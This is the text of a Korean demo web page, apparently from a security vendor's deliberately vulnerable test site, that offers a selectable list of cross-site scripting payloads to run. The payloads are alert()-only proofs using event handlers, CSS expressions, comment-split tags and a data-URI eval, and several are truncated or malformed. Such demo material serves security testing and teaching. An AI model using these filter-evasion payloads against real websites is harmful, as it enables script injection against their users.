PoC
홈
웹 공격
API
로그인
PoC
홈
웹 공격
API
로그인
크로스 사이트 스크립팅(XSS) 공격을 실행해 보세요.
공격 페이로드를 선택하고 실행하세요!
크로스 사이트 스크립팅(XSS)
<img src="pagerror.gif" onmouseover="javascript:alert('XSS')">
<body onload="alert('XSS')">
<BODY BACKGROUND="javascript:alert('XSS')">
<body onclick=alert("xss");>
<s/*test*/cript>ale/*test*/rt('XSS')</script>
<img style='xss:expression(alert("XSS"))'
<img style='xss:expr/*XSS*/ession(alert("XSS"))'>
<div style="width:expression(alert('XSS'))">
<img src="javascript:alert('XSS')">
<img src="jav ascript:alert('XSS')">
svg onload=setInterval(function(){with}
*//script>'alert(1)/*script/1='
math>
isindex formaction=javascript:alert(1) type=submit value=click>
script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1)
innerHTML=location.hash>#script>alert(1)/script>
abbr onblur=alert(1) tabindex=1 id=x>/abbr>input autofocus>
article id=x tabindex=1 onbeforedeactivate=alert(1)>/articleinput autofocus
data onkeyup="alert(1)" contenteditable>test/data>
data onbeforecopy="alert(1)" contenteditable>test/data>
style>@keyframes slidein {}/styleframeset style='animation-duration'
sub id=x tabindex=1 onbeforedeactivate=alert(1)>/sub>input autofocus>
공격 실행
경고:
본 웹사이트는 테스트 목적으로만 사용되는 의도적으로 취약하게 설계된 데모용 웹사이트입니다.
©
Monitorapp.
All Right Reserved